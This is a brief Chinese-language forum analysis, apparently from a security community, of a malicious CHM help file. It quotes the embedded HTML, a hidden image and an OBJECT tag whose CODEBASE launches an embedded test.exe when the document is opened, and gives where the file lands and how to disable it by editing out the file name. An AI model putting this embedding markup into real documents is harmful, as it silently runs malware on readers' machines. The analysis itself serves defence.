样本来自：http://bbs.kafan.cn/viewthread.php?tid=89554&extra=page%3D1

写在前面：孤单每一天第二次提醒大家在网络上面少接触一些不健康的东西，色子头上一把刀

粗浅分析：

该文件是CHM文档，使用了内部java脚本嵌入的方法种植了病毒程序text.exe：

</script>
<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>
</body>

当运行这个帮助文档的时候就会执行病毒程序。病毒释放路径为：

C:\WINDOWS\Downloaded Program Files\test.exe（没有环境变量的判断）

对于这种挂马的方式记得几个月前见过，希望不会有发展，不然小说迷们可救遭殃了，当然也有修复的方法，就拿这个病毒来说，去掉病毒运行很容易的，使用UE直接抹掉就可以，搜索关键字text.exe替换为????????，之后保存。

对比一下：

之后文件打开后就不会中毒了，因为病毒的目录索引被毁了，就算病毒存在也不会运行，相关的图片不方便贴出，见谅